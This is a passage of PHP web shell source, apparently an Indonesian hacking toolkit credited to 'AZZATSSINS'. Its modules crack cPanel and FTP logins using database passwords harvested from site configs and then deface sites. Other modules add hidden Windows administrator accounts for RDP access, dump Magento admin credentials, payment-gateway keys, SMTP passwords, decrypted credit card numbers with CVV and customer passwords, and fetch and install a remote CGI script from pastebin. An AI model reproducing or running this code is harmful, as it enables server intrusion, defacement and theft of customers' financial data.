3243.         $usercp = explode("\r\n", $_POST['user_cp']);
3244.         $passcp = explode("\r\n", $_POST['pass_cp']);
3245.         $i = 0;
3246.         foreach($usercp as $ucp) {
3247.             foreach($passcp as $pcp) {
3248.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
3249.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
3250.                     } else {
3251.                         $_SESSION[$ucp] = "1";
3252.                         $_SESSION[$pcp] = "1";
3253.                         if($ucp == '' || $pcp == '') {
3254.                             //
3255.                         } else {
3256.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3257.                             $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
3258.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
3259.                             if((!$ftp_login) || (!$ftp_conn)) {
3260.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
3261.                             } else {
3262.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
3263.                                 $fi = htmlspecialchars($_POST['file_deface']);
3264.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
3265.                                 if($deface) {
3266.                                     $i++;
3267.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
3268.                                     if(function_exists('posix_getpwuid')) {
3269.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
3270.                                         if($domain_cp == '') {
3271.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
3272.                                         } else {
3273.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
3274.                                             foreach($domains_cp[1] as $dj) {
3275.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
3276.                                                 $user_cp_url = $user_cp_url['name'];
3277.                                                 if($user_cp_url == $ucp) {
3278.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
3279.                                                     break;
3280.                                                 }
3281.                                             }
3282.                                         }
3283.                                     } else {
3284.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
3285.                                     }
3286.                                 } else {
3287.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
3288.                                 }
3289.                             }
3290.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3291.                         }
3292.                     }
3293.                 }
3294.             }
3295.         }
3296.         if($i == 0) {
3297.         } else {
3298.             echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>AZZATSSINS.</font>";
3299.         }
3300.     } else {
3301.         echo "<center>
3302.         <form method='post'>
3303.         Filename: <br>
3304.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
3305.         Deface Page: <br>
3306.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-lo-deface.com/filemu.php' style='width: 450px;'><br>
3307.         USER: <br>
3308.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
3309.         $_usercp = fopen("/etc/passwd","r");
3310.         while($getu = fgets($_usercp)) {
3311.             if($getu == '' || !$_usercp) {
3312.                 echo "<font color=red>Can't read /etc/passwd</font>";
3313.             } else {
3314.                 preg_match_all("/(.*?):x:/", $getu, $u);
3315.                 foreach($u[1] as $user_cp) {
3316.                         if(is_dir("/home/$user_cp/public_html")) {
3317.                             echo "$user_cp\n";
3318.                     }
3319.                 }
3320.             }
3321.         }
3322.         echo "</textarea><br>
3323.         PASS: <br>
3324.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
3325.         function cp_pass($dir) {
3326.             $pass = "";
3327.             $dira = scandir($dir);
3328.             foreach($dira as $dirb) {
3329.                 if(!is_file("$dir/$dirb")) continue;
3330.                 $ambil = file_get_contents("$dir/$dirb");
3331.                 if(preg_match("/WordPress/", $ambil)) {
3332.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
3333.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
3334.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
3335.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
3336.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
3337.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
3338.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
3339.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
3340.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
3341.                 } elseif(preg_match("/client/", $ambil)) {
3342.                     preg_match("/password=(.*)/", $ambil, $pass1);
3343.                     if(preg_match('/"/', $pass1[1])) {
3344.                         $pass1[1] = str_replace('"', "", $pass1[1]);
3345.                         $pass .= $pass1[1]."\n";
3346.                     }
3347.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
3348.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
3349.                 }
3350.             }
3351.             echo $pass;
3352.         }
3353.         $cp_pass = cp_pass($dir);
3354.         echo $cp_pass;
3355.         echo "</textarea><br>
3356.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
3357.         </form>
3358.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
3359.     }
3360. }
3361.  
3362. elseif($_GET['do'] == 'erdipi') {
3363. echo "<center>STATUS<br>$status_work</center><br><br><div id='result'>
3364. <form action='' method='post'>
3365. <input type='text' name='username' placeholder='Username' value='42247551N5'>
3366. <input type='text' name='password' placeholder='Password' value='42247551N5'>
3367. <input type='submit' name='shc_krdp' value='Submit'>
3368. </form>
3369. <pre>";
3370. if($_POST['shc_krdp']){
3371.     $krdp_user = $_POST['username'];
3372.     $krdp_password = $_POST['password'];
3373.     $cmd_cek_user   = shell_exec('net user');
3374.     if(preg_match($krdp_user,$cmd_cek_user)){
3375.             echo "$krdp_user sudah ada";
3376.     }else {
3377.     $admin_list = array(
3378.         'Administrators',
3379.         'Administrator',
3380.         'Administrateur',
3381.         'admins',
3382.         'sadmin',
3383.         'Administrador',
3384.         );
3385.     if(shell_exec('net user $krdp_user $krdp_password /add')){
3386.     echo "[+] USER : <font color=lime>$krdp_user | $krdp_password</font><br>";
3387.     foreach ($admin_list as $key => $admins_list) {
3388.     if(shell_exec('net localgroup $admins_list $r_user /add')){
3389.     echo "[+] localgroup : <font color=lime>$admins_list</font><br>";
3390.     }else{
3391.     echo "[+] <font color=red>Kesalahan pada localgroup $admins_list</font><br>";
3392.     }
3393.     }echo "[INFO] Connect to IP Computer (RDP) <font color=lime>$s_server_ip</font><br>";
3394.     echo '<hr>[NET USER INFO]<br>'.shell_exec('net user');
3395.     }else{
3396.     echo "[+] Username : <font color=red>$krdp_user | Password : $krdp_password , Gagal menambahkan</font><br>";   
3397.     }
3398.     }
3399. }
3400. echo"</pre>
3401. </div></center>";
3402. }
3403. elseif($_GET['do'] == 'erdipi2') {
3404.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
3405.         if($_POST['create']) {
3406.             $user = htmlspecialchars($_POST['user']);
3407.             $pass = htmlspecialchars($_POST['pass']);
3408.             if(preg_match("/$user/", exe("net user"))) {
3409.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
3410.             } else {
3411.                 $add_user   = exe("net user $user $pass /add");
3412.                 $add_groups1 = exe("net localgroup Administrators $user /add");
3413.                 $add_groups2 = exe("net localgroup Administrator $user /add");
3414.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
3415.                 echo "[ RDP ACCOUNT INFO ]<br>
3416.                ------------------------------<br>
3417.                IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
3418.                Username: <font color=lime>$user</font><br>
3419.                Password: <font color=lime>$pass</font><br>
3420.                ------------------------------<br><br>
3421.                [ STATUS ]<br>
3422.                ------------------------------<br>
3423.                ";
3424.                 if($add_user) {
3425.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
3426.                 } else {
3427.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
3428.                 }
3429.                 if($add_groups1) {
3430.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
3431.                 } elseif($add_groups2) {
3432.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
3433.                 } elseif($add_groups3) {
3434.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
3435.                 } else {
3436.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
3437.                 }
3438.                 echo "------------------------------<br>";
3439.             }
3440.         } elseif($_POST['s_opsi']) {
3441.             $user = htmlspecialchars($_POST['r_user']);
3442.             if($_POST['opsi'] == '1') {
3443.                 $cek = exe("net user $user");
3444.                 echo "Checking username <font color=lime>$user</font> ....... ";
3445.                 if(preg_match("/$user/", $cek)) {
3446.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
3447.                    ------------------------------<br><br>
3448.                    <pre>$cek</pre>";
3449.                 } else {
3450.                     echo "[ <font color=red>belum ada</font> ]";
3451.                 }
3452.             } elseif($_POST['opsi'] == '2') {
3453.                 $cek = exe("net user $user indoxploit");
3454.                 if(preg_match("/$user/", exe("net user"))) {
3455.                     echo "[change password: <font color=lime>indoxploit</font>] -> ";
3456.                     if($cek) {
3457.                         echo "<font color=lime>Berhasil</font>";
3458.                     } else {
3459.                         echo "<font color=red>Gagal</font>";
3460.                     }
3461.                 } else {
3462.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
3463.                 }
3464.             } elseif($_POST['opsi'] == '3') {
3465.                 $cek = exe("net user $user /DELETE");
3466.                 if(preg_match("/$user/", exe("net user"))) {
3467.                     echo "[remove user: <font color=lime>$user</font>] -> ";
3468.                     if($cek) {
3469.                         echo "<font color=lime>Berhasil</font>";
3470.                     } else {
3471.                         echo "<font color=red>Gagal</font>";
3472.                     }
3473.                 } else {
3474.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
3475.                 }
3476.             } else {
3477.                 //
3478.             }
3479.         } else {
3480.             echo "-- Create RDP --<br>
3481.            <form method='post'>
3482.            <input type='text' name='user' placeholder='username' value='indoxploit' required>
3483.            <input type='text' name='pass' placeholder='password' value='indoxploit' required>
3484.            <input type='submit' name='create' value='>>'>
3485.            </form>
3486.            -- Option --<br>
3487.            <form method='post'>
3488.            <input type='text' name='r_user' placeholder='username' required>
3489.            <select name='opsi'>
3490.            <option value='1'>Cek Username</option>
3491.            <option value='2'>Ubah Password</option>
3492.            <option value='3'>Hapus Username</option>
3493.            </select>
3494.            <input type='submit' name='s_opsi' value='>>'>
3495.            </form>
3496.            ";
3497.         }
3498.     } else {
3499.         echo "<br><center><font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font></center><br>";
3500.     }
3501. }
3502. elseif($_GET['do'] == 'magentot') {
3503. echo'
3504. <div id="page-wrap">  
3505. <center>  
3506. <br>  
3507. <FORM action="" method="post"><h1>
3508. <div align="center"><div><span style="color:#ff0000;">[</span><span style="color:#ff1200;">M</span><span style="color:#ff2400;"> </span><span style="color:#ff3600;">A</span><span style="color:#ff4900;"> </span><span style="color:#ff5b00;">G</span><span style="color:#ff6d00;"> </span><span style="color:#ff7f00;">E</span><span style="color:#ff8f00;"> </span><span style="color:#ff9f00;">N</span><span style="color:#ffaf00;"> </span><span style="color:#ffbf00;">T</span><span style="color:#ffcf00;"> </span><span style="color:#ffdf00;">O</span><span style="color:#ffef00;">]</span><span style="color:#ffff00;"> </span><span style="color:#dbff00;">-</span><span style="color:#b6ff00;"> </span><span style="color:#92ff00;">S</span><span style="color:#6dff00;">T</span><span style="color:#49ff00;">E</span><span style="color:#24ff00;">A</span><span style="color:#00ff00;">L</span><span style="color:#00ff20;">I</span><span style="color:#00ff40;">N</span><span style="color:#00ff60;">G</span><span style="color:#00ff80;"> </span><span style="color:#00ff9f;">I</span><span style="color:#00ffbf;">N</span><span style="color:#00ffdf;">F</span><span style="color:#00ffff;">O</span><span style="color:#00dbff;">R</span><span style="color:#00b6ff;">M</span><span style="color:#0092ff;">A</span><span style="color:#006dff;">T</span><span style="color:#0049ff;">I</span><span style="color:#0024ff;">O</span><span style="color:#0000ff;">N</span></div></h1><br>  
3509. <div align="center">coded by sohai & n4KuLa_<br>
3510. Modified by AZZATSSINS<br>
3511. <font color="red">TOOL INI HANYA DAPAT DIJALANKAN DI CMS MAGENTO</font><br><br>
3512. <input type="hidden" name="form_action" value="2">  
3513. </div>
3514. ';  
3515.  
3516. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){  
3517.     $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');  
3518.     if(isset($xml->global->resources->default_setup->connection)) {  
3519.        $connection = $xml->global->resources->default_setup->connection;  
3520.        $prefix = $xml->global->resources->db->table_prefix;  
3521.        $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1  
3522.        require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';  
3523.          
3524.        try {  
3525.            $app = Mage::app('default');  
3526.            Mage::getSingleton('core/session', array('name'=>'frontend'));  
3527.        }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}  
3528.  
3529.        if (!mysql_connect($connection->host, $connection->username, $connection->password)){  
3530.            print("Could not connect: " . mysql_error());  
3531.        }  
3532.        mysql_select_db($connection->dbname);  
3533.        echo $connection->host." | ".$connection->username." | ".$connection->password." | ".$connection->dbname." | $prefix | $key<br/>\n";  
3534.  
3535.     $crypto = new Varien_Crypt_Mcrypt();  
3536.     $crypto->init($key);  
3537.  
3538.     //=========================================================================================================  
3539.     $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");  
3540.     if (!$query){  
3541.           echo "<center><b>Gagal</b></center>";  
3542.     }else{  
3543.             $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));  
3544.           echo'<center><br><br>  
3545.                ====================================================================<br>  
3546.                                [ Daftar Admin yang terdaftar di : '.$site['website'].'] <br>  
3547.                ====================================================================<br></center>';  
3548.     }  
3549.     echo "  
3550.    <table border='1' align='center' >  
3551.    <tr>  
3552.    <td>id</td>  
3553.    <td>firstname</td>  
3554.    <td>lastname</td>  
3555.    <td>email</td>  
3556.    <td>username</td>  
3557.    <td>password</td>  
3558.    </tr>";  
3559.         while($vx = mysql_fetch_array($query)) {  
3560.         $no = 1;  
3561.         $user_id = $vx['user_id'];  
3562.         $username = $vx['username'];  
3563.         $password = $vx['password'];  
3564.         $email = $vx['email'];  
3565.         $firstname = $vx['firstname'];  
3566.         $lastname = $vx['lastname'];  
3567.         echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";  
3568.         }  
3569.     echo "</table><br>";  
3570.     //=========================================================================================================  
3571.     $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where  path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");  
3572.     if(mysql_num_rows($query) != 0){  
3573.         if (!$query){  
3574.               echo "<center><b>Gagal</b></center>";  
3575.         }else{  
3576.               echo'<br><br>  
3577.                    ====================================================================<br>  
3578.                                    [ Authorizenet ] <br>  
3579.                    ====================================================================<br>';  
3580.         }  
3581.         echo "  
3582.        <table border='1' align='center' >  
3583.        <tr>  
3584.        <td>no</td>  
3585.        <td>user</td>  
3586.        <td>pass</td>      
3587.        </tr>";  
3588.             $no = 1;  
3589.             while($vx = mysql_fetch_array($query)) {  
3590.             $user = $crypto->decrypt($vx['user']);  
3591.             $pass = $crypto->decrypt($vx['pass']);  
3592.  
3593.              
3594.             echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
3595.             $no++;  
3596.             }  
3597.         echo "</table><br>";  
3598.     }  
3599.     //=========================================================================================================  
3600.     $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");  
3601.     if(mysql_num_rows($query_smtp) != 0){  
3602.         if (!$query_smtp){  
3603.               echo "<center><b>Gagal</b></center>";  
3604.         }else{  
3605.               echo'<br><br>  
3606.                    ====================================================================<br>  
3607.                                    [ SMTP ] <br>  
3608.                    ====================================================================<br>';  
3609.         }  
3610.         echo "  
3611.        <table border='1' align='center' >  
3612.        <tr>  
3613.        <td>no</td>  
3614.        <td>host</td>          
3615.        <td>port</td>  
3616.        <td>user</td>  
3617.        <td>pass</td>      
3618.        </tr>";  
3619.             $no = 1;  
3620.             $batas = 0;  
3621.             while($rows = mysql_fetch_array($query_smtp)) {  
3622.                 $smtphost = $rows[0];  
3623.                 $smtpport = $rows[1];  
3624.                 $smtpuser = $rows[2];  
3625.                 $smtppass = $rows[3];  
3626.                 echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";  
3627.                 $no++;  
3628.             }  
3629.         echo "</table><br>";  
3630.     }  
3631.     //=========================================================================================================  
3632.     $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");  
3633.     $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
3634.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){  
3635.           echo'<br><br>  
3636.                ====================================================================<br>  
3637.                                [ Credit Card ] <br>  
3638.                ====================================================================<br>';  
3639.             echo "  
3640.            <table border='1' align='left' align='center'>  
3641.            <tr>  
3642.            <td>no</td>  
3643.            <td>Date</td>  
3644.            <td>Credit Owner</td>  
3645.            <td>method</td>  
3646.            <td>Credit Number</td>  
3647.            <td>Credit Exp</td>  
3648.            <td>CVV</td>  
3649.            <td>Address</td>  
3650.            </tr>";  
3651.                 $no = 1;  
3652.                 $batas = 0;  
3653.                 while($vx = mysql_fetch_array($query)){  
3654.                 $date = $vx['updated_at'];  
3655.                 $cc_owner = $vx['cc_owner'];  
3656.                 $method = $vx['method'];  
3657.                 $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);  
3658.                 $exp = $vx['exp'];          
3659.                 $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);      
3660.                 $Billing_Address = $vx['Billing Address'];  
3661.                 echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";  
3662.                 $batas = $no++;  
3663.                 }  
3664.                  
3665.                 while($vx2 = mysql_fetch_array($query2)){  
3666.                     $batas +=1;  
3667.                 $cc_owner = $vx2['cc_owner'];  
3668.                 $method = $vx2['method'];  
3669.                 $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);  
3670.                 $exp = $vx2['exp'];          
3671.                 $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);  
3672.                 $Billing_Address = $vx2['Billing Address'];  
3673.                 echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";  
3674.                  $batas++;  
3675.                 }      
3676.                  
3677.             echo "</table><br><br>";      
3678.     }  
3679.     //=========================================================================================================  
3680.     $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");  
3681.     $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");  
3682.      
3683.      
3684.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){  
3685.         if (!$query){  
3686.               echo "<center><b>Gagal</b></center>";  
3687.         }else{  
3688.               echo'<br><br>  
3689.                    ====================================================================<br>  
3690.                                    [ Customer ] <br>  
3691.                    ====================================================================<br>';  
3692.         }  
3693.         echo "  
3694.        <table border='1' align='center' >  
3695.        <tr>  
3696.        <td>no</td>  
3697.        <td>user</td>  
3698.        <td>pass</td>      
3699.        </tr>";  
3700.             $no = 1;  
3701.             $batas = 0;  
3702.             while($vx = mysql_fetch_array($query)) {  
3703.                 $user = $vx['email'];  
3704.                 $pass = $vx['value'];  
3705.                 echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
3706.                 $batas = $no++;  
3707.             }  
3708.              
3709.             if(mysql_num_rows($query2) != 0 && ($query2)){  
3710.                 while($vx2 = mysql_fetch_array($query2)){  
3711.                     $user = $vx2['customer_email'];  
3712.                     $pass = $crypto->decrypt($vx2['password_hash']);  
3713.                     if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin  
3714.                         $batas +=1;  
3715.                         echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";  
3716.                         $batas++;  
3717.                     }  
3718.                 }                  
3719.             }  
3720.          
3721.         echo "</table><br>";  
3722.     }  
3723.     //=========================================================================================================  
3724.   }  
3725. }  
3726. function save($format,$data){  
3727.     $fp = fopen($format, 'a');  
3728.     fwrite($fp, $data);  
3729.     fclose($fp);  
3730. }  
3731. function cekbase64($string){  
3732.         $decoded = base64_decode($string, true);  
3733.         if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;  
3734.         if(!base64_decode($string, true)) return false;  
3735.         if(base64_encode($decoded) != $string) return false;  
3736.         return true;//nilai return 1 jika true  
3737.     }  
3738. //----untuk decode password ---/  
3739. class Varien_Crypt_Mcrypt{  
3740.     /**  
3741.      * Constuctor  
3742.      *  
3743.      * @param array $data  
3744.      */  
3745.     public function __construct()  
3746.     {  
3747.     }  
3748.  
3749.     /**  
3750.      * Initialize mcrypt module  
3751.      *  
3752.      * @param string $key cipher private key  
3753.      * @return Varien_Crypt_Mcrypt  
3754.      */  
3755.     public function init($key)  
3756.     {  
3757.         $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');  
3758.         $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);  
3759.         $maxKeySize = mcrypt_enc_get_key_size($this->handler);  
3760.  
3761.         if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {  
3762.             //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);  
3763.             return null;  
3764.         }  
3765.  
3766.         mcrypt_generic_init($this->handler, $key, $iv);  
3767.  
3768.         return $this;  
3769.     }  
3770.  
3771.     /**  
3772.      * Encrypt data  
3773.      *  
3774.      * @param string $data source string  
3775.      * @return string  
3776.      */  
3777.     public function encrypt($data)  
3778.     {  
3779.         if (!$this->handler) {  
3780.             //throw new Varien_Exception('Crypt module is not initialized.');  
3781.             return null;  
3782.         }  
3783.         if (strlen($data) == 0) {  
3784.             return $data;  
3785.         }  
3786.         return base64_encode(mcrypt_generic($this->handler, $data));  
3787.     }  
3788.  
3789.     /**  
3790.      * Decrypt data  
3791.      *  
3792.      * @param string $data encrypted string  
3793.      * @return string  
3794.      */  
3795.     public function decrypt($data)  
3796.     {  
3797.         if (!$this->handler) {  
3798.             //throw new Varien_Exception('Crypt module is not initialized.');  
3799.             return null;  
3800.         }  
3801.         if (strlen($data) == 0) {  
3802.             return $data;  
3803.         }  
3804.         return mdecrypt_generic($this->handler, base64_decode($data));  
3805.     }  
3806.          
3807.    
3808.     /**  
3809.      * Desctruct cipher module  
3810.      *  
3811.      */  
3812.     public function __destruct()  
3813.     {  
3814.         if ($this->handler) {  
3815.             $this->_reset();  
3816.         }  
3817.     }  
3818.  
3819.     protected function _reset()  
3820.     {  
3821.         mcrypt_generic_deinit($this->handler);  
3822.         mcrypt_module_close($this->handler);  
3823.     }  
3824. }  
3825. }
3826. elseif($_GET['do'] == 'cgi') {
3827.     $cgi_dir = mkdir('cegei', 0755);
3828.     $file_cgi = "cegei/cgi.izo";
3829.     $isi_htcgi = "AddHandler cgi-script .izo";
3830.     $htcgi = fopen(".htaccess", "w");
3831.     $cgi_script = file_get_contents("http://pastebin.com/raw/sTDdJDhk");
3832.     $cgi = fopen($file_cgi, "w");
3833.     fwrite($cgi, $cgi_script);
3834.     fwrite($htcgi, $isi_htcgi);
3835.     chmod($file_cgi, 0755);
3836.     echo "<iframe src='cegei/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
3837. } elseif($_GET['do'] == 'fake_root') {
3838.     ob_start();
3839.     function reverse($url) {
3840.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
3841.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
3842.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
3843.               curl_setopt($ch, CURLOPT_HEADER, 0);
3844.               curl_setopt($ch, CURLOPT_POST, 1);
3845.         $resp = curl_exec($ch);
3846.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
3847.         $array = explode(",,", $resp);
3848.         unset($array[0]);
3849.         foreach($array as $lnk) {
3850.             $lnk = "http://$lnk";
3851.             $lnk = str_replace(",", "", $lnk);
3852.             echo $lnk."\n";
3853.             ob_flush();
3854.             flush();
3855.         }
3856.               curl_close($ch);
3857.     }
3858.     function cek($url) {
3859.         $ch = curl_init($url);
3860.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
3861.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
3862.         $resp = curl_exec($ch);
3863.         return $resp;
3864.     }
3865.     $cwd = getcwd();
3866.     $ambil_user = explode("/", $cwd);
3867.     $user = $ambil_user[2];
3868.     if($_POST['reverse']) {
3869.         $site = explode("\r\n", $_POST['url']);
3870.         $file = $_POST['file'];
3871.         foreach($site as $url) {
3872.             $cek = cek("$url/~$user/$file");
3873.             if(preg_match("/hacked/i", $cek)) {
3874.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
3875.             }
3876.         }
3877.     } else {
3878.         echo "<center><form method='post'>
3879.         Filename: <br><input type='text' name='file' value='AZZATSSINS.html' size='50' height='10'><br>
3880.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
3881.         Domain: <br>
3882.         <textarea style='width: 450px; height: 250px;' name='url'>";
3883.         reverse($_SERVER['HTTP_HOST']);
3884.         echo "</textarea><br>
3885.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
3886.         </form><br>
3887.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
3888.     }
3889. } elseif($_GET['do'] == 'adminer') {
3890.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
3891.     function adminer($url, $isi) {
3892.         $fp = fopen($isi, "w");
3893.         $ch = curl_init();
3894.               curl_setopt($ch, CURLOPT_URL, $url);
3895.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
3896.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
3897.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
3898.               curl_setopt($ch, CURLOPT_FILE, $fp);
3899.         return curl_exec($ch);
3900.               curl_close($ch);
3901.         fclose($fp);
3902.         ob_flush();
3903.         flush();
3904.     }
3905.     if(file_exists('adminer.php')) {
3906.         echo "<br><center><font color=lime><a href='$full/adminer.php' target='_blank'>-> Adminer Login Here <-</a></font></center><br>";
3907.     } else {
3908.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
3909.             echo "<br><center><font color=lime><a href='$full/adminer.php' target='_blank'>-> Adminer Login Here <-</a></font></center><br>";
3910.         } else {
3911.             echo "<br><center><font color=red>gagal buat file adminer</font></center><br>";
3912.         }
3913.     }
3914. }elseif($_GET['do'] == 'passwbypass') {
3915.     echo '<br><center>Bypass /etc/passwd With :<br>
3916. <table style="width:50%">
3917.  <tr>
3918.    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
3919.    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
3920.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
